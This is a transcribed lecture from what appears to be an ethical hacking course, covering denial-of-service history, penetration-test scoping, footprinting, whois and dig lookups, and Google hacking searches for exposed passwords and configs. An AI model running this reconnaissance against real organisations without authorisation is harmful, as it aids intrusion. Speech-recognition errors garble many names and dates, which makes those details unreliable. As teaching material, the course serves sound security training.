of service attack
and a denial of service
is any attack or action
that prevents a service

from being available
to its legitimate
or authorized users.
So you hear about a ping flood

or a syn flood?
That is basically a syn packet
being sent to your machine

constantly or a Smurf attack
and Smurf attack

has to do something
with icmp Echo requests
and responses using

broadcast addresses.
That one's been pretty

well shot down
over the last several years.
You can also get a denial

of service simply
from a malformed packet

or piece of data
where a piece
of data is malformed
and sent into a program.
Now if the program

doesn't handle it correctly
if it crashes suddenly
you're not able to use
that program anymore.
So therefore you are denied.
The service of the program

and thus the denial of service.
Now, as I said a denial

of service is not to be confused
with a distributed
denial of service.
And I know it's

pretty trendy particularly
in the media to call it

any denial-of-service DDOS
or any denial-of-service DDOS.
Now it's important to note
that any denial of service

is not a DDOS a DDOS or
as you might know

a distributed denial
of service is a very specific

thing distributed denial
of the service is a coordinated

denial-of-service making use
of several hosts
in several locations.
So if you think about a botnet

as an example a botnet
could be used to trigger

a distributed denial of service,
but I've got a lot of bots
that I'm controlling

from a remote location
and I'm using all

these boards to do something
like sending a lot of data

to particular server
when I've got a lot of system

sending even small amounts
of data all of that data

can overwhelm the server
that I'm sending it to
so the Behind a distributed

denial-of-service attack is
too overwhelmed resources
on a particular server
in order to cause that server
not to be able to respond.
Now the first known

DDOS attack use the tool
called stock Old Rod,
which is German for barbed wire

the stock Old Rod came
out of some work that a guy

by the name of mr.
Was doing in 1999.
He wrote a proof
of concept piece
of code called tfn,
which was the

tribe flood Network.
Let me just show that for you.
So you can see
on the Wikipedia page

the try flat Network
or tfn is a set
of computer programs
that is used to conduct various

DDOS attacks such as icmp
flood syn floods UDP flowers

and small for tax.
Now.
I know many people

don't really consider
Wikipedia really good source

of any sort of knowledge,
but it's a good place

to start off.
So if you want to read

about all these types
of attacks like icmp floods
and what exactly is

a syn flood you can always do
that from It's
not that bad place.
Of course, you should use

Wikipedia as your final
Rosetta Stone moving on.
So this program called Old Rod,
which was it was used to attack

servers like eBay and Yahoo!
Back in February of 2000
so that tack in February

of 2000 was really
the first known distributed

denial-of-service attack,
which is not to say
that there weren't denial

of service attacks previously So
to that there were

certainly plenty of them,
but they were

not distributed now
this means If there

weren't a lot of systems
used to coordinate
and create a denial-of-service

condition and therefore
we get distributed
denial-of-service attack.
So that's a handful
of type of tax
and some pretty common attacks
that you're going to see

as an ethical hacker
when you become

an ethical hacker
or if you're trying
to become an ethical hacker,
you should always know

about these types of attacks.
Okay.
So in this lesson,
we're going to be talking

about penetration testing
and some of the details

around how it works
and Logistics and specifically

things like scope so,
Exactly is penetration testing.
So well, not surprisingly.
It's testing to see

if you can penetrate something
which means you're going

to check to see
whether you can break

into a particular thing.
Whether it's a server or

in applications depending
on the type of Engagement.
You've got you may have

the ability to try to break
in physically to a location
but primarily but you're

going to be doing
with penetration testing
is you're going to be trying

to break into systems
and networks and applications.
And that's the kind

of what It's all about
and this may actually involve

social engineering attacks.
So it may require you

to make a phone call
to somebody and get them

to give you their username
and password or some other type
of social engineering attack
where maybe you send a URL

via a crafted email.
Sometimes it's just strictly

a technical approach.
We're running scans
and you're running Metasploit

and you're gaining
access that way or maybe

some other type of Technology.
Application sort of connection,
sometimes it's physical access

that you need.
So in order to get access

to a particular system,
if you can get physical access

then maybe you can get in
so that was all about
that's what exactly

penetration testing is.
It's checking whether you

can get into a system
whether it be physically
or on a network.
So what are the goals
of penetration testing the goals

would be to assess weakness
in an organization
security postures.
We want to figure out

what they're vulnerable
so that they can go and fix

It's these problems you want
to help them understand

their risk positions better
and what they can
or may be able to do
to mitigate those risks
and ultimately you want

to be able to access systems
in a particular way
to find weaknesses.
So those are really

sort of the goals
of penetration testing now

from a result standpoint
when you're done you're testing

what you are going to do.
Well, you're probably going to

generate a report and by that,
I don't mean you're going

to run some automated tool
and you're going

to get it to generate.
The report for you,
you're actually going to give

that to the client.
You're actually going to give

you a report to the client
and then they're going to write

you a really large check.
So that's not really

how it works.
You're going to write a report

detailing the findings
in a detailed way
so that it includes
what did you do to find out
what you actually found out
and how you can actually

mitigate that particular risk.
So you should really include

remediation activities in order
to fix this vulnerabilities
that you find and it's

pretty easy to walk
around saying hey,
that's a problem
and that's problematic.
And that's a problem.
That's really not a lot of value
in that where there's

a value is that hey,
that's a problem.
And here's how you

can go about fixing it.
So let's talk about the scope

of penetration testing.
So firstly you want

to actually realize
how big is the breadbox

and how specifically what is it
that the you two of the two

of you have agreed
that being you

the ethical hacker
and the other guy being

the authorized person to give
you permission to ethically

hack specifically agree
that you can do

penetration testing.
And you can Target them as

an organization or decline
and what you have agreed

to our any exclusions
or any sort of areas
that they say you're not allowed

to touch so anything so
like if they've got

a database server,
maybe there's a lot

of really sensitive data on it
and there's a little hesitant
and they may put don't touch

this thing clause in the school.
So there are a lot

of different reasons
why they may exclude

areas from the scope
and if they exclude them

then trust their reason
and listen to them
what They have to say

in terms of this is
what we want you to accomplish.
So along those lines you

really need to get sign off
from the target organization.
Now, we've talked

about this before
and this is certainly all

about the ethics then trust
and it's also about legality
because if you do something
that you don't have

permissions to do you
could be prosecuted for that.
So definitely get the scope

very clear in writing
and with signatures attached

to it as to what you can
and what you can't do
and always get approval

from the right people
and make sure you get Buddy
who has the right level
of permissions and is
the right level of management
so that they can sign off
on its understanding
and accept the risk
that is associated
with a penetration test.
So let me talk a little bit

about security assessments
and how they differ

from penetration tests.
The security assessment

is a hand
in hand approach with clients.
So you would walk in doing

a collaborative thing
where you're a trusted partner

and you are live with them
and your goal

isn't to penetrate them
and point out all the things.
That are really bad,
but it's to get a full

assessment of the risk
that the organization is exposed
to and you would probably

provide more details about fixes
that maybe you would

in a penetration test.
Now what we're going to do

is we're going to walk in
and make sure
that the policies
and procedures they have

in place are really
what they need

for the organization
and the risk appetite

that they've got
and we're going to make sure
that the policies

and procedures have controlled
that can tell us
whether they are being

actually adhere to or not.
Procedures and policies

are being followed
a security assessment is
probably a little bit
more comprehensive
than a penetration test
and you would look

at more factors to assess
the security postures

of the organization
in their overall risk
and you would tailor the output

based on the risk appetite
and what they're most interested

in and that's not to say
that I'm going to tell them

what they want to hear.
But if there's something

that they know and I know
that they're just

not going to do
I'm not going to be making

a big deal out of it
because they're already

Eddie aware of it
and I'll make a note

of it in the report just
for a complete the sick,
but I'm not going to go out

in a lot of details.
So it's really kind of

a hand hand collaborative
approach where again,
you're not just saying
that they want us to say we're

providing some real security
and risk guidance

towards her activities
and other things
so it may provide
an unrealistic view.
So you've got a week.
Let's say to do
this penetration test
against your target.
Now, you're going to have

to go in you're going
to have to get setup.
You're also going to have

to start doing a bunch
of scans and make sure
that Gathering information
and screenshots and data

for your reports
you're going to have to do

all sorts of activities.
Also during the course

of that week.
You're going to be engaged

in probably beginning
to write your report
and getting a sense of

what is going to say
and what's going to be in it.
If you don't actually

get any major penetration
during the course of that week

the organization may feel
like their code and code secure.
That's one of the reasons

why penetration testing
while really sexy

and show is nice and all
but if an organization walks

out of it it believing
that in a week,
you didn't manage to get

no get the Keys of the Kingdom.
They might must be secure

that's really misguided view
because I'm dedicated skilled

and motivated attacker
isn't going to just take a week

or some portion of that fee.
They're after something

they're going to dedicate
themselves to do it
and really go after it.
So just because you didn't find

a penetration in some subset
of week doesn't mean
that they're secure and Illman

and in vulnerable to attacks.
It just means
that during the course
of that particular week

and The circumstances
that were in place you

can get a penetration
that was really

significant or major.
That's all it means.
It doesn't mean anything

beyond that and
if an organization
walks away feeling
like the secure they're going
to end up not fixing

the real vulnerabilities
that may be in place
that could expose them

to significant risks.
So that's penetration
testing its corpse its goals
and how it differs

to security assessments now,
it's time to go
over foot reading.
So what is footprinting well

for printing is getting an idea.
Via of the entire scope

of your target.
That means not just the scope
that you were given
which may be an address block

or it may be a domain name
that even maybe a set

of a truss blocks.
Now, what you want to do

is you want to figure
out all the information
that's associated with that

in great detail
as you can possibly get so you

want the list of domain names
as you're going
to go through this
you probably want some sort
of database or Excel
spreadsheet or something.
Track of all the information
because you're going to have

a lot of it at the end.
You want to be able

to find information quickly.
So having some sort

of in a notepad going
with your notes or
as I said spreadsheet
or a database.
So if you can get organized
in that way you want to keep

all those sorts of things down.
So in this case,
I want to do
some search on suppose.
Let's say Eddie

record dot go now.
I need Network block.
So so far we found out

that just made up IP addresses
because I'm just

putting information down,
but I need never be Block,
so you may have one IP address

that you can find externally
or you're going to want to hold
range of internal clocks and you

can do a little bit of digging.
If you aren't provided those you

want specific IP addresses
for critical systems web

servers email servers databases.
If you can find any

of these things
of those sorts and you

want system architectures
and what kind of stuff are they

running are they running Intel
are they running windows?
Are they running

some Unix systems?
What are they running?
What kind of Access

Control lists they have.
These are going to be To get

but you may be able to guess
them and you can guess

these by doing Port
can so what sort of responses

you get back from the port scans
with the filters and are

what you don't get back.
We'll tell you about

if there's an IDs
around or some you want

to do a system numeration,
or you can get access
to a system somehow you want

to know usernames group name.
So on so the basic idea
of footprinting is
gathering information now
if you can get access to system

somehow you want to no use
Names group names so you want

system banners routing tables
SNMP information if you

can get it DNS host names
if you can get those now,
this is for both internal

and external on the side.
If you're doing
an internal penetration test
or ethical hacking engagement.
You want to know the networking

protocols that are out there.
Are they using TCP IP,
or are they using some UDP
or are they on ipx

or SPX the using decnet
or appletalk or are they

using some sort of split DNS?
In other words?
Do they have internal DNS?
So was that give different foam
for the external and will it

give different information?
If you want to check for

remote access possibilities now
in the foot printing process
you want to be very exhaustive

you might want to try
and take out email addresses

server domain name Services.
I mean IP addresses
or even contact numbers
and you want to be very

exhausted with your approach.
You don't want to miss

anything out because
if you do that,
you can continue
and also provide some some

launching points for additional.
Tax or test that you

may be able to do but this
is definitely a starting point

of the types of information
that you need to have
as you go about
footprinting your target.
Now next thing

that we are going to see
is very interesting.
This is one
of the many common tools
that are out there

on the internet and
that is the Wayback machine

or also known as archive.org now
while it might not give you all

the information that you need
but it gives certainly

gives you a starting point
and what we're talking about

here is the Wayback machine
or archive.org so Just
give you a quick look
at what archive.org looks like.
Okay.
I already have it open out here.
So audio what you can see is
how a website look

like around some time ago.
So for example,
if you want to look at

with Google look like
so you just have to search

for Google out here and wait
for results to come back.
Okay.
So we see that Google goes

way back to 1998.
So that was the last capture

or the first capture other.
It was the first capture

by the Way back machine
and we can see

that it has a screenshot
of November 11th
and how Google looked so,
let's see what Google look

like in November 11th of 1988.
So this is what Google look
like it was there was

actually nothing to it.
It just said welcome to Google

Google search engine prototypes
and it hasn't link.
So yeah, this is what the Google

search engine look like.
It had a Stanford surge.
It had a Linux urge
and you could do

all sorts of stuff.
You could just put

the results now.
I'm trying to tell y'all is

you can see the evolution
of the website should time

to the Wayback machine
and this gives you rather

in informated look
into how website

has actually evolved.
Okay.
Now that we know what

for printing is
and how it falls into

the hole recognition process.
So let's go over a couple

of websites to do a little bit
of historical thinking
about companies and the types
of infrastructure
that they may be using
and this information

of course is useful
so that we can narrow

down our Focus.
Us in terms of what we want

to Target against them
for attacks now over time

we've improved our awareness
about what sorts
of information we may want

to divulge so several years ago
you may have gone to a company's

website and discover
that you could get

email addresses and names
of people in positions
that you may find relevant
and there were all sorts

of bits of information
that could be used

against the company
and over time we have discovered
that those are pieces
of information probably
don't belong in a website
where they can be used

against the company
and so they've been pulled

off now The used to be also
that Google had the ability

to pull up information
that it had cash so far.
For example,
if a website is
no longer available or
if it was temporarily
down and offline.
There was a little cash button

that you can click
when you did

and the Google search
and you could pull up

that cast information.
So even though the website

wasn't available you can still
get information from Google's

servers now Google's remove
that so we don't have

that ability any longer.
However, there is
an internet archive
that we can Use so this thing

is called the Wayback machine
and I have it open out here.
So it's archive.org / web.
So archive.org is a website
that gives us information

about other websites
and how they look

like in years ago
and by so I'm going to go

to the Wayback machine
which you can see is

at the archive.org
and I'm going to go and try and

search for Eddie record dot go.
So now we're going

to take a historical look
at Eddie record dot goes website
and you can see we've got

some years and they've got
information going back up
to Thousand thirteen,
so let's look at what
this website looked
like when it was just 2013.
Okay, there doesn't seem

to be any snapshots out here.
I wonder what's going on.
Okay.
So let's go 2014 and

the first snapshot seems to be
on the September 12th of 2014.
Actually.
It's on May 17 to so
let's see what
that looks like.
Okay.
So this is what Eddie

regular look like back in 2013
or other 2014 September

12 2014 to be actually exact
now you can see
that the we have

some live classes
and all this pictures there
and they've got this weird

picture of the sky
and here I don't know why

that was a thing back in 2014.
Now we can browse more

advanced screen shots
or rather the screen shots

that were taken later on and see
how this company has evolved

with this infrastructure
and the way it actually

lays out its content.
Okay, so it still hasn't evolved

but I can go a couple
of years ahead and see
what this has actually

evolved into so
if I would go to December 2016,
so this is what it looked

like in 2016 and we can see
that they've added

this weird box out here
about brides and courses

they have other search bar
that kind of looks weird,
but it's mostly

because my Internet is slow
and it's not loading

all the elements.
They've also changed
how they've actually laid

out the courses we can also.
Oh see a change
in the prices, I guess.
So, yeah, this tells us
about how it evolves

as complete website.
Now this other website I want to

talk about is called net crap.
Now next craft does
internet research including

the types of web servers
that companies run and they

have a web server service.
You can see here as we scroll

the Apache server service has
sixty four point three percent

of the internet Market,
of course,
and that's followed by Microsoft

with 13% interesting information
may be useful information,
but even more useful

than that is looking.
But different companies

Run for the websites
and you can see here.
Okay.
So let's try and search

for Eddie Rekha dot code here.
So let's just put

in the website URL
and that net craft

generate the site report.
So as you can see
that some stuff

is not available.
You know that the net

block owner is
by Amazon Technologies name

server is this thing right here?
DNS admin is
AWS DNS host Master.
We also have the IP address

we can go for a wire look up.
Up the IP on virustotal
you can do that.
There is no IPv6 present.
So that's some information
that we can see so we

can obviously opt-out not
Target IPv6 ranges.
Then there's also reverse DNS
then we also have a bunch

of Hosting history.
So this is a history
of it and we know
that it's hosted on a Linux
system with an Apache web server
and it was last seen
and this was when it

was last updated.
So this is some very

useful information.
You can also get information

on If like Netflix,
so if you just type, okay
I said I just
spelled that wrong.
So let me just change

from the URL out here.
So if you go and die for

netflix.com and you'll see
that it will show you

all sorts of information.
So as you see that it's

on an e WS server.
It's Amazon data services,
Ireland and this is

all the hosting history
that it goes along
with it has some send the

policy Frameworks domain-based
message authentication
and Reporting confirmations.
And there's all sorts
of information that you

can get about websites
and web servers from net craft.
So the Wayback machine
long with net craft make up

for some interesting tools
that are available

on the internet from which
you can do a little bit
of your reconnaissance recess.
Okay.
Now that we have gone

over net craft
and the Wayback machine now,
it's time to actually
get to know how to use

the little information
that the side actually provides.
So what the next topic
that we are going to go

over is using DNS to get
more information now we're going

to be Going over to land.
This is called
who is and the utility
that is used to query

the various Regional internet
registries the store information

about domain names
and IP addresses and let

me just show it to you
about all the internet

registries are there.
So I have Aaron dotnet open
out here and these are

the internet registries
that provides the isps
and looks over the Internet

control as a whole.
So here we have afrinic we

have up next we have Aaron
we have lacnic
and we have ripe NCC
so These are all the regions

and all the different types
of stuff that they support
all the different countries.
You can look at the map
that it is pouring out

here by just hovering
over the providers.
So as you can see all

these Brown region
out here is Africa
after Nick then we have up next

which is black or grayish thing,
which is India and Australia
and quite a lot of issue

then we have iron
which is a lot of North America

in the United States me.
Then this lacnic

which is mostly the Latino side,
which is a South American part.
Then we have the rest of Europe
which is ripe NCC

and this is the part
that ripe NCC is providing

internet to okay.
So that was all

about the internet registries.
Now, let's get back to the topic
and that is using DNS

to get more information.
Now for this we are going to

be using a Linux based system.
So I have a bunch of running

on my virtual machine
out here and let me

just log into it.
So firstly we are going

to be using this Square.
I recalled who is that looks up
these internet registries

that I just showed you.
Let me just quickly remove this.
Okay.
So for acquiring information
from the regional internet

registries that I just talked
about you can use
who is to get information
about who owns

a particular IP address.
So for example,
I could do who is and

let's see I could do
who is Google or rather

netflix.com and we can get
all sorts of information

about Netflix so we can see
that we Of the visit markmonitor

then let's see.
Let's go up and look

for all sorts of information
that has been given to

us by this who is query.
So as you guys can see I just

went a little bit too much.
Okay.
So registry domain ID,
we have the domain ID

where it is registered as
a registered URL is markmonitor.
Okay.
So this is for marking actually

now the creation date is 1997.
So you haven't realized Netflix
been around for a long time
and it's been updated on 2015.
And registry expiry date
as we see is 2019 that's going

to actually go off this here.
Then this is all

useful information
so we can see all sorts

of domain status
the name server URL the DNS SEC

that it says unsigned.
This is very useful information
that is being provided

by very simple query.
Now, if you want to know who

owns a particular IP address,
so let's see if we get back

the IP address out there.
We should have got

back the IP address,
but it's kind of lost on me.
So To get back the IP address

also for a domain name service.
So, you know,
so you could use

this command called dick.
So your dick netflix.com.
that it has returned a bunch

of multiple IP addresses
at these are all

the IP addresses
that Netflix's so I
could do something like
if I was trying to check out
who all the certain

IP address and for example,
I have got one

of these IP addresses,
but let's just assume

I don't know
that actually belongs to Netflix
so I can go who is
50 4.77 dot hundred and eight to
and it'll give

me some information
so As you guys can see

it is giving us a bunch
of information as to who this is

and how it is happening.
So we see that it is
from Aaron dotnet and so

we can very smartly assume
that it's from the North

American part know
we can also see

that it's in Seattle.
So our guess was

completely right.
So it also gives us a range.
So this is
something very useful.
So if you see we now have

the rain age of the IPS
that might be being

used by this guy.
So we indeed have 54 and it

says it goes up to the 54.
There's also 34 lat now.
Let's check that out and see

what information we get set
who is and let's check it out.
What was the IP

that we were just seeing
is 34.2 49.1 25.1 67.
So 34.2 49.1 65 I don't know.
Let's see.
You can also put in

a random IP address.
It don't really matter
and they'll give

you the information.
So let's see is this
and some IP address even

this seems to be an error
and IP address
and it's also based in Seattle
and we got
a bunch of information.
So that's how you can use the
who is query
and the query do actually

get all sorts of information
about the domain name service

and get information
from a DNS basically.
So now let's go
over some theoretical part
that Is for DNS.
So using DNS to get

information so firstly
what is the domain name service?
And why do we need?
So a domain name service is

a name given to an IP address
so that it's easy to remember.
Of course you it's easy

to remember names
and demonics rather than a bunch

of random weird numbers.
Now, this was mainly
so that we can map names

to IP addresses and we can get
the a bunch of information

from the host name resolution.
So that's the purpose

of IP addresses now
we Also be looking at
how to find network ranges.
Okay.
Now before we get

onto actually moving on
to how to find out

the network ranges,
let me just show you

how you can also use
who is so who is suppose

you want to know the domains
with the word feu in it.
So you could go
who is fool and this

will give you a whole bunch
of things but hafu exist

and all the sorts of foods
that there is on the internet.
So that was
one interesting flag,
and if you want to know
how to use more about Who is

you could just go - - hell?
Yes.
Yeah.
So this is all
the types of stuff
that we can do with who is

so you can set the host
we can set the board
that we want to search for then

we can set with the elf laughing
and find one level

less specific match
and we can do an exact

match to an inverse
look up for
specified attributes.
Then we can also set the source

we can set verbose type
and we can choose
for request template

with this bunch of stuff.
Can do so you could suppose say
who is verbose and suppose

any record dot coal
and I'll give you

a verbose version
of the right database

query service objects
aren't RPS out format

the right database objectives.
So, okay.
Let's try something else

like who is netflix.com?
Okay, I'm sorry.
I was supposed to be were both

and I kept doing Edge silly me.
So you do V and that will give
you a much more like this

is the right database again.
And I think
I'm doing something wrong.
Okay, just for that thing.
OK V and tight okay,

or let's just see
that's let me just show you
how to use video primary

keys are returned.
Only primary Keys.
Okay.
Let's see.
Let's try that out.
Okay, so it seems to be
that this is a ripe

database query service
and objects are

in our PSL format.
So it won't really
work for that thing.
And it also says
that no entries found

because this error
so this is for
some layer lessons.
So for now,
I hope I gave you a good idea

of how to use Hue is
like you could Just go ho is
then some IP address 192.168.1.1

or some Gabriel just like that
or you could just go

for a domain name service
like Facebook and get all sorts

of information about Facebook
when the query actually

returns you something.
Okay.
So let's move on
to network range is now now

in this part of the video.
We are going to be going
over the utility called who is
which is used for getting

information from the DNS.
Now, let me just show

you a website.
Get out here.
So this is the regional

internet registries.
So the internet registries

are used to store information
about domain names
and IP addresses and there are
five Regional internet

registries first is iron,
which is responsible
for North America.
So that would be the US and

Canada then we have laugh make
for Latin America
and portions of the Caribbean
then there's ripe
that's responsible for Europe

and Middle East
and Central Asia.
There's afrinic which is

responsible for Africa.
And finally we have up next
for Asia Pacific Rim.
So, that's the Regional internet

registries and as I said
who is responsible
for acquiring information
from the various

Regional internet registries
as you can use who is to get
information about who owns
a particular IP address,
for example, let me just open

up my Ubuntu system.
Let me clear this out first.
So as I was just saying,
for example, you could go

who is facebook.com.
Okay.

we could find out
pretty quickly about who owns

a particular IP address.
So for example,
I could do who is
in just go facebook.com
and tells me about who it

belongs to a also gives you
who owns a particular IP address
and who's responsible

for them from the information.
You can get email addresses.
I belong to
a particular company.
This one has an email address
for Tech contact

of Ip reg address it
so you can get all sorts

of email addresses
attack contacts and all sorts

of stuff out there
the Database contains

only.com and dotnet
and all sorts of information.
Now.
I want to query
a different IP address
and different information
belongs in the different

Regional internet registries,
of course,
so if I want to go
to a particular database,
I will have to use

the minus H flag
so I could do who is Aaron net

and remember the IP address
and I'm going

to query that again.
And of course I get

the same information back
because I went there
so you could just go
who is Edge and then follow it

with an IP address.
So something like 30 4.25
the 176 the 98 so that's

just some random IP address.
I just made up and it says

that who is option?
Okay.
So it's a it's a capital H.
Okay.
So let's see
that and we get all sorts

of information back from that.
So area a Darren and all sorts
of stuff now I
can get information
about domains as well.
So if I can query
something like netflix.com
and I can find out that this is
that actually Netflix
and there's an
administrative contact
and the technical content that I

need to see the difference.
Main server so service
that foot have

authority of information
about the DNS entries

for that particular domain.
You can also see

other information like
when the record was created
and whole bunch

of different phone numbers
that you contact an

additional storing information
about IP addresses
and domain name.
Sometimes it will
store information
about particular host names
and there may be other reasons

why you would store a hostname
or particular information
about hosting on
the system where the one
of the rare rirs now
if I want to wanted to look

up something specifically So
once I have found
that I could know do a look up
on who is supposed say

something like who is full.
So let's say who is fool.
Now if you already don't have
who is installed you

can easily install it
by just going up to install
who is on your Unix system

and that should do the trick
and then you can start use

this really Nifty tool.
about using who is now let's get

on to actually using
how to Network ranges

for a domain.
Okay.
So now let's talk about how we

are going to be going over
and fighting next ranges.
So suppose you bought it

at engagement and you only
know the domain name
and you don't know much
beyond that and you're

expected to figure out
where everything is
and what everything is.
So how do you go
about doing that?
Well use some of the tools that

we either have been talking
about or will soon be talking

about in more detail.
And the first thing

I'm going to do is I'm going
to use a domain name

that you record.com
and I'm going to look up at you

like a DOT go and see
if I get get an IP address back.
So let's just head over there

and go poo is Eddie record
or not cool,
or we could use
the host keyword.
So as you see we get

an IP address back
and that is 34 the to dander
to 30 the 35 and that is

the IP address and you see
that I've got back

an IP address.
So here's just an IP address
and I don't know what

that IP address belongs to
and I also don't know

how big the network range
or network block is
that's associated
with so what I'm
Do is a who is and I'm going

to look up with Aaron
who owns it IP address
so you can basically go

who is 34.2 10.2 3935.
that gives us a bunch

of information and
who is now this doesn't seem to

have a very big Network range,
but unlike something

like Netflix.
So suppose we were
to do something like host

netflix.com and see See now.
We have a bunch of IP addresses.
So suppose we will do
who is let's see
who is 52.99 the $40 147
now I'm expecting Netflix

to be a much larger company
and have a better.
Yeah now see we get net range.
So this is the network range

that we're talking about.
So we had a random IP address
and now we have found

the network range.
So that's how
Find network ranges
and this can be very useful.
So this gives me evidence
that netflix.com has a presence

on different addresses.
The one I have also
located by looking up
that particular host name.
So I've got one address

here that I can look at.
Let's take a look at the website
because let me
different address.
Now if I didn't have

that I could also go
and do something
like an MX flag.
So let's see I could go dig
and this will give us

all the male's so dig MX.
And let's see.

Let's see what MX
does actually you go help
so we could do dig -
Edge for a list of options.
So these are all the options

that we have and the one
that we're going to use

is something like this.
Do you think MX and we say

something like netflix.com.
So these are all

mailings and mx's
that we have gotten from Netflix

and this is information
regarding it's still

producing information.
That's a big thing to produce.
Okay.
So as I was just
saying you can use
the MX flag I could get back all

the mail handlers in this case
and their mail is being handled

by Google and let's see wait,
let's go until then

it's going to tell me
that Google is not particularly

surprising and other things
that you can do is check

for different host names
since I'm assuming DNS

probably doesn't allow
Zone transfers since most DNA.
Has servers don't anymore,
although they used to you

may have to start guessing
so I could do something like

Web Mail said we find out here.
So it's showed us a dump of all
the ascending memory stuff.
about finding Network

ranges now moving on
to our next topic is using

Google for recognizance.
Now some people also call

this Google hacking now,
if you know how to use Google
to exactly Target and find

what you are looking for.
Google is an excellent tool

for recognitions purposes.
And today.
I'm going to show you

how you could use Google exactly
for your searches.
So first of all,
let's go Open a tab

of Google so open up here.
So let's go to google.com.
Ok.
So now we're going to be talking
about how we can use Google to

actually gain some information
or some targeted information.
So this is in general called

Google hacked now
when I say Google hacking

I'm not meaning
by breaking into Google

to steal information.
I'm talking about making use

of specific keywords
that Google uses to get

the most out of the queries
that you submit.
So for example,
a pretty basic one is the use

of quotations you go things
in order to use Civic phrases.
Otherwise Google will find pages
that have instances
of all those words rather than

the word specifically together
in particular order.
So I'm going to pull this query

up and this shows a list
of let me just show it to you.
So you go index off now.
This is showing us an index

of all the films now.
This is basically all

those index of size
that you want.
So as you guys can see the show

this index of all sorts of films
that are there now you

can Use index of and you see
that we have also
an index of downloads
or something like that.
-.com such download
and it is an index
of all sorts of stuff.
Now you can go into some folder

and check them out G Jones.
You weren't EG Perico.
I don't know what these are

but some sort of self.
And this is how you

can use Google Now.
Let me just show you

some more tricks.
So you can use this

suppose you're using Google
to find for something

like a presentation
so you could use something

like file type.
DP DX and it'll search

for every type of file there.
That is Peabody.
Okay.
Let's try some other

side PVD so config.
Okay.
So this brings up all

the types of files
that have some configs in them.
So some gaming configuration
as we see this initial

configuration of Liverpool.
Now, you could also use

something like the sing and URL
and you can use

some other route.
And this will give

you all the things
that route in their URL.
So King rude and Digital Trends
and how to root Android

so fasten the root
and suppose you want

to say something like all
in file type or suppose.
You want some extension

so so dot P BTW the pptx.
Does that work?
Let's search for

JavaScript files.
Okay.
I think it's JS.
Okay, that doesn't seem

to work either.
This shows us all the things

that she estimate.
No, it's just external JS.
I'm doing this wrong.
So you could use file type.
So let's see file type

and we go see doc.
So these are all the documents
that you could find

at the file type thing.
And you could also

do GS, I guess.
Yeah.
This is give you all

the JavaScript files are there.
So this is how you can use

Google to actually narrow
down your searches
to suppose you want

a particular set of keywords,
and we want to make sure we get

the password file from Google.
Okay.
So now let's go
into more details

about the various things.
You can find

using Google hacking.
Now while Google hacking
techniques are really useful
for just general

searching in Google.
They're also useful

for penetration testers
or ethical hackers.
You can narrow down information
that you get from Google you

get a specific list of systems
that may be vulnerable
so we can do things
like look for are pages
that do in the title error.
So I'm going to get

a whole bunch of information.
So suppose like we go in title

and we say error So
as that we get
all sorts of stuff
and we can do
the mines Google part.
So if you don't mind is

Google not show you the stuff
that's from Google.
So we get a variance
documentation pages
about different vendors

and the errors
that they support.
So here's one doc

about Oracle about Java error,
but you know something more

specific we may be able to get
errors about all sorts

of other stuff.
So this is how you could use

the Google hacking technique
to your own advantage
of your penetration tester.
Now, let's also show

You something called
the Google hacking database now.
This is very useful

for an ethical hacker.
Now on the Google hacking

database was created
several years ago by

a guy called Johnny Long
who put this Google hacking

database together to begin
to compile a list of searches
that would bring

up interesting information.
Now Johnny has written a couple

of books on Google hacking.
So we're at the Google

hacking database website here
and you can see them talk
about Google Docs

and all sorts of stuff.
Now you can see
that we can do all sorts

of search like and you
are Elsa BC B SP this brings up

some portal Pages now out here.
You can bring up some password

APS password and URL.
Now this will give

you all sorts of stuff
on Google suppose you go and URL

like a PS password.
Now, you can get all sorts
of stuff like which have

passwords in their URL.
So maybe you can just guess
a password from there to now
that was Google hacking
so Google hacking
entries and they also,
Number of categories
and that you can look through

to find some specific things.
So you may be interested

in of course
and you will search

specific information that you
may be looking for with regards

to specific product.
For example, let me

just show you XY database.
These are all

the certain types of stuff.
You can go through out here.
And as you see we have all sorts
of sound like is
an SQL injection thing.
This is something
regarding Pier archived ours.
So these let you get a foothold

in the some password cracking.
Alms and you can do

some Brute Force checking
and you can see here
if it talks about the type

of searches and what it reveals.
You can just click here

on Google search engine
will actually bring up

Google fit a list of responses
that Google generates.
So let's look at this one here.

This type is a log.
So this is something
about cross-site scripting logs
and we can also

see some party logs
if I was not wrong
so some denial-of-service POC

and we can see a bunch of stuff
and if you continue

to scroll down there,
Our interesting information
in here so somehow
somebody's got a party log
that has a lot of information.
They've got it up
on a website and basically
bunch of information
that you can see you can also

get some surveillance video
sometimes and you can look

into them and this basically
how you could use Google.
So it's basically a list of

queries that you can go through
and this is a very useful site
if you are a penetration tester

and looking for some help
with your Google

hacking terminologies,
so that's it for
Or Google hacking now.
Let's move on.
Okay.
So now it's time

for some networking fundamentals
and what better place

to begin with dcpip.
Now we're going to be talking

about the history of dcpip
and the network
that eventually morphed

into the thing
that we now call the internet.
So this thing began

in 1969 and it spun
out of this government

organization called arpa
which Advanced research

projects agency and they
had an idea to create

a computer network
that was resilient

to a certain type
of military attacks
and the idea was

to have This network
that could survive certain types

of war and warlike conditions.
So our percent out this request

for proposals to BBN,
which is Bolt beranek and Newman

and they were previously
and acoustical consulting

company and they won
the contract to build
what was called the arpanet.
The first connection

was in 1969.
So that's where we get the idea
that the internet began

in 1969 and the internet
as we call it now Then

Shall We Begin but arpanet it
and often it has a long history
that goes goes through NSF net
in 1980s and after arpanet

was sort of decommissioned
and a lot of other networks

were folded into this
this thing called nsfnet
that then turned into

what we now call the internet
and once a lot of other

networks were connected
into its first protocol

on the arpanet
initially there were

18 to 22 protocols,
which is very first protocol

defining communication
on arpanet and it
was called 1822 protocol
because BBN report

1822 which describes
how it works shortly

and after that.
It was just think all

the network control program
and the network

control program consisted
of arpanet host-to-host protocol

and an initial control protocol.
Now, they're certainly

not a direct correlation
or an analogy here.
But if you want to think
about it in particular
where you can say
that the arpanet host-to-host

protocol is kind of like UDP
and initial connection

protocol or ICP.
It's kind of like TCP.
So the host-to-host
protocol provided
a unidirectional flow control

steam stream between hosts.
Which sounded a little bit

like UDP and ICP
provided a bi-directional pair

of streams between Two Hosts.
And again, these

aren't perfect knowledge.
He's but the host-to-host

protocol is a little I bit
like UDP and ICP is a little bit
like TCP now now

the first router was called
an interface message processor

and that was developed by BBN.
It was actually
a ruggedized Honeywell computer
that had special

interfaces and software.
So the first router wasn't

Roundup built piece of Hardware,
but it was actually

an existing piece of hardware.
Especially published
for this particular application.
So Honeywell had this computer

that they made out and BBN took
that and made some specific

hardware and faces
and build some special software
